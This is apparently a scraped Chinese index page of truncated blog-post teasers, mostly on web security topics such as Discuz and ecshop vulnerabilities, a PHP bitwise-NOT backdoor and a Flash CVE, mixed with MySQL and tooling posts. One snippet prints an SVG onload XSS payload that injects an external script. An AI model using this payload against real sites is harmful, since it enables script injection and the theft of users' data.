在近期,河南地区的防火墙已经试点 SNI 阻断(很荣幸我的博客被列入清单了)了。虽然其他地区的读者暂时还没体验到这个防火墙,但是这种阻断方式如果推广开来,那么我们就得失联了。这篇教程就来在河南模式没有...
Seay信息安全博客
Discuz7.X通杀0day漏洞(UCenter Home-2.0) |
显示不全请点击全屏阅读 */ Author : KnocKout */ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers */ Contact: kn...
编程茶楼
php中使用按位取反创建后门
1)PHP ~位运算符 前一段时间老外在twitter上爆出个有趣的东西,一串疑似乱码的字符串访问后却能正常输出1337。 PHP: 位运算符 - http://www.php.n...
>Fckeditor漏洞最新整理
搜集于网络、以及个人经验 ————————————...
Mysql
MySQL使用与优化总结
这篇文章总结了工作中用到MySQL的一些常见问题,解决方案;合适的使用场景和优化方案。 存储引擎的选择:MyISAM vs InnoDB MyISAM:支持全文索引;使用表级锁;读并发性能好。 ...
>Flash远程代码执行漏洞(CVE-2012-0779)视频以及样本
Flash播放器的漏洞,出来有几天了,补丁地址:https://www.adobe.com/support/security/bulletins/apsb12-09.html发布日期:2012-05-...
Seay信息安全博客
代码审计:ecshop最新版本SQL注入+存储XSS=任意管理
显示不全请点击全屏阅读 一个功能点的SQL注入和存储XSS,内含多种技巧,我觉得我就是个艺术家~~ 刚下的ecshop V2.7.3版本~ 1.漏洞存在于站外广告统计功能(对应管理后台的...
SyntaxHighlighter 3.0.83 的使用
SyntaxHighlighter 是一套在浏览器上对各种代码进行语法着色的独立 JavaScript 库。 官方下载地址:http://alexgorbatchev.com/SyntaxHighli...
xss构造
<svg/onload=s=createElement('script');body.appendChild(s);s.src='url';> ...
系统文档
御坂 OCI(甲骨文云)Bot 使用教程
在之前的一段时间内,由于甲骨文云ARM的VPS的性价比挺高,导致其一度供不应求。这时候,R探长的出现,可以在一定程度上借助Oracle Cloud的API,帮助我们抢到机器。不过,资本家的本性懂得都懂...
